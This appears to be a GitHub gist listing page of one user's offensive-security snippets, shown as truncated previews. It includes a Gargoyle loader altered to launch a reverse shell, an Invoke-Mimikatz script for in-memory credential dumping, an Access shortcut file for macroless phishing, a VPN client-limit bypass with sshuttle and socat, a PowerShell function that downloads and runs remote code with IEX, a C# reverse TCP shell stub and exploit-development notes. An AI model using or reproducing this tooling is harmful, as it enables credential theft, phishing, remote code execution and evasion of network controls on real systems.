aDoN adon90

  • Spain
@adon90
adon90 / setup.nasm
Last active May 18, 2018
Gargoyle setup.nasm to execute a reverse shell instead of messagebox
View setup.nasm
BITS 32
STRUC Configuration
.initialized: RESD 1
.setup_addr: RESD 1
.setup_length: RESD 1
.VirtualProtectEx: RESD 1
.WaitForSingleObjectEx: RESD 1
.CreateWaitableTimer: RESD 1
.SetWaitableTimer: RESD 1
@adon90
adon90 / mimikatz.ps1
Last active May 29, 2018
PowerShell Shellcode Injection fix on Win 10 (v1803)
View mimikatz.ps1
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
@adon90
adon90 / Database3.accde
Last active Jul 4, 2018
Phishing Access Macroless .MAM Extension
View Database3.accde
------Database Shortcut--------
[Shortcut Properties]
AccessShortcutVersion=1
DatabaseName=Database3.accdb
ObjectName=pwnid
ObjectType=Macro
Computer=W10PTTEST
DatabasePath=http://IP/Database3.accde
EnableRemote=0
CreationTime= 1d4138fe237a9fc
@adon90
adon90 / bypassvpn.txt
Last active Jul 10, 2018
Bypass VPN Number of Clients
View bypassvpn.txt
HOST
openvpn adon901.ovpn
COMPUTER 1
sshuttle -vr root@HOST 10.10.0.0/8
COMPUTER 2
sshuttle -vr root@HOST 10.10.0.0/8
HOST:
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
View runas-cabesha-webdelivery
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
}
View powershell_api.txt
"@
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
{
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
@adon90
adon90 / exploiting.txt
Last active Aug 1, 2018
Exploiting Tricks
View exploiting.txt
Mona tricks:
---------------
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
-----------------
View ReverseC#TCP
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
{
View VulnerableDotNetHTTPRemoting.cs
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
public class DateTimeServer : MarshalByRefObject, IDisposable
View Frida
import sys
import pefile
import frida
def on_message(message, data):
    print "[%s] -> %s" % (message, data)